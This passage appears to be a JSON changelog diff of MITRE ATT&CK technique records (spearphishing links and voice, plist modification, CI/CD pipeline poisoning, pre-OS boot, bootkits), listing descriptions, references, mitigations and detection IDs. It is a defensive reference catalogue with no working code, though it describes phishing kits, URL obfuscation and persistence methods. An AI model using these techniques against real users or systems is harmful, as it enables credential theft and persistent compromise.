+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Philip Winther",
+                        "Sebastian Salla, McAfee",
+                        "Robert Simmons, @MalwareUtkonos",
+                        "Ohad Zaidenberg, @ohad_mz",
+                        "Liora Itkin",
+                        "Liran Ravich, CardinalOps",
+                        "Scott Cook, Capital One"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": false,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "PRE"
+                    ],
+                    "x_mitre_version": "1.4",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.717000+00:00\", \"old_value\": \"2026-04-17 16:15:21.344000+00:00\"}}}",
+                    "previous_version": "1.4",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1017: User Training",
+                            "M1054: Software Configuration"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0823: Detection of Phishing for Information"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--2d3f5b3c-54ca-4f4d-bb1f-849346d31230",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-10-02 17:09:50.723000+00:00",
+                    "modified": "2026-05-12 15:12:00.624000+00:00",
+                    "name": "Spearphishing Link",
+                    "description": "Adversaries may send spearphishing messages with a malicious link to elicit sensitive information that can be used during targeting. Spearphishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Spearphishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)) and/or sending multiple, seemingly urgent messages.\n\nAll forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this scenario, the malicious emails contain links generally accompanied by social engineering text to coax the user to actively click or copy and paste a URL into a browser.(Citation: TrendMictro Phishing)(Citation: PCMag FakeLogin) The given website may be a clone of a legitimate site (such as an online or corporate login portal) or may closely resemble a legitimate site in appearance and have a URL containing elements from the real site. URLs may also be obfuscated by taking advantage of quirks in the URL schema, such as the acceptance of integer- or hexadecimal-based hostname formats and the automatic discarding of text before an \u201c@\u201d symbol: for example, `hxxp://google.com@1157586937`.(Citation: Mandiant URL Obfuscation 2023)\n\nAdversaries may also embed \u201ctracking pixels,\u201d \"web bugs,\" or \"web beacons\" within phishing messages to verify the receipt of an email, while also potentially profiling and tracking victim information such as IP address.(Citation: NIST Web Bug)(Citation: Ryte Wiki) These mechanisms often appear as small images (typically one pixel in size) or otherwise obfuscated objects and are typically delivered as HTML code containing a link to a remote server.(Citation: Ryte Wiki)(Citation: IAPP)\n\nAdversaries may also be able to spoof a complete website using what is known as a \"browser-in-the-browser\" (BitB) attack. By generating a fake browser popup window with an HTML-based address bar that appears to contain a legitimate URL (such as an authentication portal), they may be able to prompt users to enter their credentials while bypassing typical URL verification methods.(Citation: ZScaler BitB 2020)(Citation: Mr. D0x BitB 2022)\n\nAdversaries can use phishing kits such as `EvilProxy` and `Evilginx2` to perform adversary-in-the-middle phishing by proxying the connection between the victim and the legitimate website. On a successful login, the victim is redirected to the legitimate website, while the adversary captures their session cookie (i.e., [Steal Web Session Cookie](https://attack.mitre.org/techniques/T1539)) in addition to their username and password. This may enable the adversary to then bypass MFA via [Web Session Cookie](https://attack.mitre.org/techniques/T1550/004).(Citation: Proofpoint Human Factor)\n\nAdversaries may also send a malicious link in the form of Quick Response (QR) Codes (also known as \u201cquishing\u201d). These links may direct a victim to a credential phishing page.(Citation: QR-campaign-energy-firm) By using a QR code, the URL may not be exposed in the email and may thus go undetected by most automated email security scans.(Citation: qr-phish-agriculture) These QR codes may be scanned by or delivered directly  to a user\u2019s mobile device (i.e., [Phishing](https://attack.mitre.org/techniques/T1660)), which may be less secure in several relevant ways.(Citation: qr-phish-agriculture) For example, mobile users may not be able to notice minor differences between genuine and credential harvesting websites due to mobile\u2019s smaller form factor.\n\nFrom the fake website, information is gathered in web forms and sent to the adversary. Adversaries may also use information from previous reconnaissance efforts (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)) to craft persuasive and believable lures.",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "reconnaissance"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1598/003",
+                            "external_id": "T1598.003"
+                        },
+                        {
+                            "source_name": "ACSC Email Spoofing",
+                            "description": "Australian Cyber Security Centre. (2012, December). Mitigating Spoofed Emails Using Sender Policy Framework. Retrieved November 17, 2024.",
+                            "url": "https://web.archive.org/web/20210708014107/https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf"
+                        },
+                        {
+                            "source_name": "TrendMictro Phishing",
+                            "description": "Babon, P. (2020, September 3). Tricky 'Forms' of Phishing. Retrieved October 20, 2020.",
+                            "url": "https://www.trendmicro.com/en_us/research/20/i/tricky-forms-of-phishing.html"
+                        },
+                        {
+                            "source_name": "IAPP",
+                            "description": "IAPP. (n.d.). Retrieved March 5, 2024.",
+                            "url": "https://iapp.org/resources/article/web-beacon/"
+                        },
+                        {
+                            "source_name": "QR-campaign-energy-firm",
+                            "description": "Jonathan Greig. (2023, August 16). Phishing campaign used QR codes to target large energy company. Retrieved November 27, 2023.",
+                            "url": "https://therecord.media/phishing-campaign-used-qr-codes-to-target-energy-firm"
+                        },
+                        {
+                            "source_name": "PCMag FakeLogin",
+                            "description": "Kan, M. (2019, October 24). Hackers Try to Phish United Nations Staffers With Fake Login Pages. Retrieved October 20, 2020.",
+                            "url": "https://www.pcmag.com/news/hackers-try-to-phish-united-nations-staffers-with-fake-login-pages"
+                        },
+                        {
+                            "source_name": "Microsoft Anti Spoofing",
+                            "description": "Microsoft. (2020, October 13). Anti-spoofing protection in EOP. Retrieved October 19, 2020.",
+                            "url": "https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/anti-spoofing-protection?view=o365-worldwide"
+                        },
+                        {
+                            "source_name": "Mr. D0x BitB 2022",
+                            "description": "mr.d0x. (2022, March 15). Browser In The Browser (BITB) Attack. Retrieved March 8, 2023.",
+                            "url": "https://mrd0x.com/browser-in-the-browser-phishing-attack/"
+                        },
+                        {
+                            "source_name": "Mandiant URL Obfuscation 2023",
+                            "description": "Nick Simonian. (2023, May 22). Don't @ Me: URL Obfuscation Through Schema Abuse. Retrieved August 4, 2023.",
+                            "url": "https://www.mandiant.com/resources/blog/url-obfuscation-schema-abuse"
+                        },
+                        {
+                            "source_name": "NIST Web Bug",
+                            "description": "NIST Information Technology Laboratory. (n.d.). web bug. Retrieved March 22, 2023.",
+                            "url": "https://csrc.nist.gov/glossary/term/web_bug"
+                        },
+                        {
+                            "source_name": "Proofpoint Human Factor",
+                            "description": "Proofpoint. (n.d.). The Human Factor 2023: Analyzing the cyber attack chain. Retrieved July 20, 2023.",
+                            "url": "https://www.proofpoint.com/sites/default/files/threat-reports/pfpt-us-tr-human-factor-report.pdf"
+                        },
+                        {
+                            "source_name": "Ryte Wiki",
+                            "description": "Ryte Wiki. (n.d.). Retrieved November 17, 2024.",
+                            "url": "https://en.ryte.com/wiki/Tracking_Pixel/"
+                        },
+                        {
+                            "source_name": "qr-phish-agriculture",
+                            "description": "Tim Bedard and Tyler Johnson. (2023, October 4). QR Code Scams & Phishing. Retrieved November 27, 2023.",
+                            "url": "https://www.proofpoint.com/us/blog/email-and-cloud-threats/cybersecurity-stop-month-qr-code-phishing"
+                        },
+                        {
+                            "source_name": "ZScaler BitB 2020",
+                            "description": "ZScaler. (2020, February 11). Fake Sites Stealing Steam Credentials. Retrieved March 8, 2023.",
+                            "url": "https://www.zscaler.com/blogs/security-research/fake-sites-stealing-steam-credentials"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Philip Winther",
+                        "Sebastian Salla, McAfee",
+                        "Menachem Goldstein",
+                        "Robert Simmons, @MalwareUtkonos",
+                        "Elpidoforos Maragkos, @emaragkos",
+                        "Joas Antonio dos Santos, @C0d3Cr4zy",
+                        "Austin Herrin",
+                        "Obsidian Security",
+                        "Sam Seabrook, Duke Energy"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "PRE"
+                    ],
+                    "x_mitre_version": "1.7",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.624000+00:00\", \"old_value\": \"2025-10-24 17:48:34.880000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "1.7",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1017: User Training",
+                            "M1054: Software Configuration"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0878: Detection of Spearphishing Link"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--6a5d222a-a7e0-4656-b110-782c33098289",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2023-09-07 21:48:39.516000+00:00",
+                    "modified": "2026-05-12 15:12:00.640000+00:00",
+                    "name": "Spearphishing Voice",
+                    "description": "Adversaries may use voice communications to elicit sensitive information that can be used during targeting. Spearphishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Spearphishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: [Impersonation](https://attack.mitre.org/techniques/T1684/001)) and/or creating a sense of urgency or alarm for the recipient.\n\nAll forms of phishing are electronically delivered social engineering. In this scenario, adversaries use phone calls to elicit sensitive information from victims. Known as voice phishing (or \"vishing\"), these communications can be manually executed by adversaries, hired call centers, or even automated via robocalls. Voice phishers may spoof their phone number while also posing as a trusted entity, such as a business partner or technical support staff.(Citation: BOA Telephone Scams)\n\nVictims may also receive phishing messages that direct them to call a phone number (\"callback phishing\") where the adversary attempts to collect confidential information.(Citation: Avertium callback phishing)\n\nAdversaries may also use information from previous reconnaissance efforts (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)) to tailor pretexts to be even more persuasive and believable for the victim.",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "reconnaissance"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1598/004",
+                            "external_id": "T1598.004"
+                        },
+                        {
+                            "source_name": "Avertium callback phishing",
+                            "description": "Avertium. (n.d.). EVERYTHING YOU NEED TO KNOW ABOUT CALLBACK PHISHING. Retrieved February 2, 2023.",
+                            "url": "https://www.avertium.com/resources/threat-reports/everything-you-need-to-know-about-callback-phishing"
+                        },
+                        {
+                            "source_name": "BOA Telephone Scams",
+                            "description": "Bank of America. (n.d.). How to avoid telephone scams. Retrieved September 8, 2023.",
+                            "url": "https://business.bofa.com/en-us/content/what-is-vishing.html"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "PRE"
+                    ],
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.640000+00:00\", \"old_value\": \"2026-04-17 16:07:06.553000+00:00\"}}}",
+                    "previous_version": "1.0",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1017: User Training"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0886: Detection of Spearphishing Voice"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--7d20fff9-8751-404e-badd-ccd71bda0236",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2022-04-09 15:06:32.458000+00:00",
+                    "modified": "2026-05-12 15:12:00.644000+00:00",
+                    "name": "Plist File Modification",
+                    "description": "Adversaries may modify property list files (plist files) to enable other malicious activity, while also potentially evading and bypassing system defenses. macOS applications use plist files, such as the <code>info.plist</code> file, to store properties and configuration settings that inform the operating system how to handle the application at runtime. Plist files are structured metadata in key-value pairs formatted in XML based on Apple's Core Foundation DTD. Plist files can be saved in text or binary format.(Citation: fileinfo plist file description) \n\nAdversaries can modify key-value pairs in plist files to influence system behaviors, such as hiding the execution of an application (i.e. [Hidden Window](https://attack.mitre.org/techniques/T1564/003)) or running additional commands for persistence (ex: [Launch Agent](https://attack.mitre.org/techniques/T1543/001)/[Launch Daemon](https://attack.mitre.org/techniques/T1543/004) or [Re-opened Applications](https://attack.mitre.org/techniques/T1547/007)).\n\nFor example, adversaries can add a malicious application path to the `~/Library/Preferences/com.apple.dock.plist` file, which controls apps that appear in the Dock. Adversaries can also modify the <code>LSUIElement</code> key in an application\u2019s <code>info.plist</code> file  to run the app in the background. Adversaries can also insert key-value pairs to insert environment variables, such as <code>LSEnvironment</code>, to enable persistence via [Dynamic Linker Hijacking](https://attack.mitre.org/techniques/T1574/006).(Citation: wardle chp2 persistence)(Citation: eset_osx_flashback)",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "defense-impairment"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1647",
+                            "external_id": "T1647"
+                        },
+                        {
+                            "source_name": "eset_osx_flashback",
+                            "description": "ESET. (2012, January 1). OSX/Flashback. Retrieved April 19, 2022.",
+                            "url": "https://www.welivesecurity.com/wp-content/uploads/200x/white-papers/osx_flashback.pdf"
+                        },
+                        {
+                            "source_name": "fileinfo plist file description",
+                            "description": "FileInfo.com team. (2019, November 26). .PLIST File Extension. Retrieved October 12, 2021.",
+                            "url": "https://fileinfo.com/extension/plist"
+                        },
+                        {
+                            "source_name": "wardle chp2 persistence",
+                            "description": "Patrick Wardle. (2022, January 1). The Art of Mac Malware Volume 0x1:Analysis. Retrieved April 19, 2022.",
+                            "url": "https://taomm.org/PDFs/vol1/CH%200x02%20Persistence.pdf"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": false,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "macOS"
+                    ],
+                    "x_mitre_version": "2.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.644000+00:00\", \"old_value\": \"2026-04-16 20:07:52.947000+00:00\"}}}",
+                    "previous_version": "2.0",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1013: Application Developer Guidance"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0109: Detection Strategy for Plist File Modification (T1647)"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--7655ac3b-dfde-49c5-a967-242856174434",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-05-22 20:01:16.611000+00:00",
+                    "modified": "2026-05-12 15:12:00.642000+00:00",
+                    "name": "Poisoned Pipeline Execution",
+                    "description": "Adversaries may manipulate continuous integration / continuous development (CI/CD) processes by injecting malicious code into the build process. There are several mechanisms for poisoning pipelines: \n\n* In a <b>Direct Pipeline Execution</b> scenario, the threat actor directly modifies the CI configuration file (e.g., `gitlab-ci.yml` in GitLab). They may include a command to exfiltrate credentials leveraged in the build process to a remote server, or to export them as a workflow artifact.(Citation: Unit 42 Palo Alto GitHub Actions Supply Chain Attack 2025)(Citation: OWASP CICD-SEC-4)\n* In an <b>Indirect Pipeline Execution</b> scenario, the threat actor injects malicious code into files referenced by the CI configuration file. These may include makefiles, scripts, unit tests, and linters.(Citation: OWASP CICD-SEC-4)\n* In a <b>Public Pipeline Execution</b> scenario, the threat actor does not have direct access to the repository but instead creates a malicious pull request from a fork that triggers a part of the CI/CD pipeline. For example, in GitHub Actions, the `pull_request_target` trigger allows workflows running from forked repositories to access secrets.  If this trigger is combined with an explicit pull request checkout and a location for a threat actor to insert malicious code (e.g., an `npm build` command), a threat actor may be able to leak pipeline credentials.(Citation: Unit 42 Palo Alto GitHub Actions Supply Chain Attack 2025)(Citation: GitHub Security Lab GitHub Actions Security 2021) Similarly, threat actors may craft pull requests with malicious inputs (such as branch names) if the build pipeline treats those inputs as trusted.(Citation: Wiz Ultralytics AI Library Hijack 2024)(Citation: Synactiv Hijacking GitHub Runners)(Citation: GitHub Security Labs GitHub Actions Security Part 2 2021) Finally, if a pipeline leverages a self-hosted runner, a threat actor may be able to execute arbitrary code on a host inside the organization\u2019s network.(Citation: John Stawinski PyTorch Supply Chain Attack 2024)\n\nBy poisoning CI/CD pipelines, threat actors may be able to gain access to credentials, laterally move to additional hosts, or input malicious components to be shipped further down the pipeline (i.e., [Supply Chain Compromise](https://attack.mitre.org/techniques/T1195)). ",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "execution"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1677",
+                            "external_id": "T1677"
+                        },
+                        {
+                            "source_name": "Synactiv Hijacking GitHub Runners",
+                            "description": "Hugo Vincent. (2024, May 22). Hijacking GitHub runners to compromise the organization. Retrieved May 22, 2025.",
+                            "url": "https://www.synacktiv.com/en/publications/hijacking-github-runners-to-compromise-the-organization"
+                        },
+                        {
+                            "source_name": "GitHub Security Lab GitHub Actions Security 2021",
+                            "description": "Jaroslav Loba\u010devski. (2021, August 3). Keeping your GitHub Actions and workflows secure Part 1: Preventing pwn requests. Retrieved May 22, 2025.",
+                            "url": "https://securitylab.github.com/resources/github-actions-preventing-pwn-requests/"
+                        },
+                        {
+                            "source_name": "GitHub Security Labs GitHub Actions Security Part 2 2021",
+                            "description": "Jaroslav Loba\u010devski. (2021, August 4). Keeping your GitHub Actions and workflows secure Part 2: Untrusted input. Retrieved May 22, 2025.",
+                            "url": "https://securitylab.github.com/resources/github-actions-untrusted-input/"
+                        },
+                        {
+                            "source_name": "John Stawinski PyTorch Supply Chain Attack 2024",
+                            "description": "John Stawinski IV. (2024, January 11). Playing with Fire \u2013 How We Executed a Critical Supply Chain Attack on PyTorch. Retrieved May 22, 2025.",
+                            "url": "https://johnstawinski.com/2024/01/11/playing-with-fire-how-we-executed-a-critical-supply-chain-attack-on-pytorch/"
+                        },
+                        {
+                            "source_name": "Unit 42 Palo Alto GitHub Actions Supply Chain Attack 2025",
+                            "description": "Omer Gilm Aviad Hahami, Asi Greenholts, and Yaron Avital. (2025, March 20). GitHub Actions Supply Chain Attack: A Targeted Attack on Coinbase Expanded to the Widespread tj-actions/changed-files Incident: Threat Assessment . Retrieved May 22, 2025.",
+                            "url": "https://unit42.paloaltonetworks.com/github-actions-supply-chain-attack"
+                        },
+                        {
+                            "source_name": "OWASP CICD-SEC-4",
+                            "description": "OWASP. (n.d.). CICD-SEC-4: Poisoned Pipeline Execution (PPE). Retrieved May 22, 2025.",
+                            "url": "https://owasp.org/www-project-top-10-ci-cd-security-risks/CICD-SEC-04-Poisoned-Pipeline-Execution"
+                        },
+                        {
+                            "source_name": "Wiz Ultralytics AI Library Hijack 2024",
+                            "description": "Wiz Threat Research. (2024, December 9). Ultralytics AI Library Hacked via GitHub for Cryptomining. Retrieved May 22, 2025.",
+                            "url": "https://www.wiz.io/blog/ultralytics-ai-library-hacked-via-github-for-cryptomining"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Arun Seelagan, CISA"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": false,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "SaaS"
+                    ],
+                    "x_mitre_remote_support": false,
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.642000+00:00\", \"old_value\": \"2025-10-21 02:38:29.636000+00:00\"}}}",
+                    "previous_version": "1.0",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1018: User Account Management",
+                            "M1054: Software Configuration"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0533: Detection Strategy for Poisoned Pipeline Execution via SaaS CI/CD Workflows"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--7f0ca133-88c4-40c6-a62f-b3083a7fbc2e",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2019-11-13 14:44:49.439000+00:00",
+                    "modified": "2026-05-12 15:12:00.662000+00:00",
+                    "name": "Pre-OS Boot",
+                    "description": "Adversaries may abuse Pre-OS Boot mechanisms as a way to establish persistence on a system. During the booting process of a computer, firmware and various startup services are loaded before the operating system. These programs control flow of execution before the operating system takes control.(Citation: Wikipedia Booting)\n\nAdversaries may overwrite data in boot drivers or firmware such as BIOS (Basic Input/Output System) and The Unified Extensible Firmware Interface (UEFI) to persist on systems at a layer below the operating system. This can be particularly difficult to detect as malware at this level will not be detected by host software-based defenses.",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "stealth"
+                        },
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "persistence"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1542",
+                            "external_id": "T1542"
+                        },
+                        {
+                            "source_name": "Wikipedia Booting",
+                            "description": "Wikipedia. (n.d.). Booting. Retrieved November 13, 2019.",
+                            "url": "https://en.wikipedia.org/wiki/Booting"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": false,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Linux",
+                        "macOS",
+                        "Network Devices",
+                        "Windows"
+                    ],
+                    "x_mitre_version": "2.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.662000+00:00\", \"old_value\": \"2026-04-17 18:38:50.048000+00:00\"}}}",
+                    "previous_version": "2.0",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1026: Privileged Account Management",
+                            "M1035: Limit Access to Resource Over Network",
+                            "M1046: Boot Integrity",
+                            "M1047: Audit",
+                            "M1051: Update Software"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0278: Detection Strategy for T1542 Pre-OS Boot"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--1b7b1806-7746-41a1-a35d-e48dae25ddba",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2019-12-19 21:05:38.123000+00:00",
+                    "modified": "2026-05-12 15:12:00.622000+00:00",
+                    "name": "Bootkit",
+                    "description": "Adversaries may use bootkits to persist on systems. A bootkit is a malware variant that modifies the boot sectors of a hard drive, allowing malicious code to execute before a computer's operating system has loaded. Bootkits reside at a layer below the operating system and may make it difficult to perform full remediation unless an organization suspects one was used and can act accordingly.\n\nIn BIOS systems, a bootkit may modify the Master Boot Record (MBR) and/or Volume Boot Record (VBR).(Citation: Mandiant M Trends 2016) The MBR is the section of disk that is first loaded after completing hardware initialization by the BIOS. It is the location of the boot loader. An adversary who has raw access to the boot drive may overwrite this area, diverting execution during startup from the normal boot loader to adversary code.(Citation: Lau 2011)\n\nThe MBR passes control of the boot process to the VBR. Similar to the case of MBR, an adversary who has raw access to the boot drive may overwrite the VBR to divert execution during startup to adversary code.\n\nIn UEFI (Unified Extensible Firmware Interface) systems, a bootkit may instead create or modify files in the EFI system partition (ESP). The ESP is a partition on data storage used by devices containing UEFI that allows the system to boot the OS and other utilities used by the system. An adversary can use the newly created or patched files in the ESP to run malicious kernel code.(Citation: Microsoft Security)(Citation: welivesecurity)",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "stealth"
+                        },
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "persistence"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1542/003",
+                            "external_id": "T1542.003"
+                        },
+                        {
+                            "source_name": "Lau 2011",
+                            "description": "Lau, H. (2011, August 8). Are MBR Infections Back in Fashion? (Infographic). Retrieved November 13, 2014.",
+                            "url": "http://www.symantec.com/connect/blogs/are-mbr-infections-back-fashion"
+                        },
+                        {
+                            "source_name": "Mandiant M Trends 2016",
+                            "description": "Mandiant. (2016, February 25). Mandiant M-Trends 2016. Retrieved November 17, 2024.",
+                            "url": "https://web.archive.org/web/20211024160454/https://www.fireeye.com/content/dam/fireeye-www/current-threats/pdfs/rpt-mtrends-2016.pdf"
+                        },
+                        {
+                            "source_name": "welivesecurity",
+                            "description": "Martin Smol\u00e1r. (2023, March 1). BlackLotus UEFI bootkit: Myth confirmed. Retrieved February 11, 2025.",
+                            "url": "https://www.welivesecurity.com/2023/03/01/blacklotus-uefi-bootkit-myth-confirmed/"
+                        },
+                        {
+                            "source_name": "Microsoft Security",
+                            "description": "Microsoft Incident Response. (2023, April 11). Guidance for investigating attacks using CVE-2022-21894: The BlackLotus campaign. Retrieved February 12, 2025.",
+                            "url": "https://www.microsoft.com/en-us/security/blog/2023/04/11/guidance-for-investigating-attacks-using-cve-2022-21894-the-blacklotus-campaign/"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Linux",
+                        "Windows"
+                    ],
+                    "x_mitre_version": "2.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.622000+00:00\", \"old_value\": \"2026-04-17 18:38:49.558000+00:00\"}}}",
+                    "previous_version": "2.0",
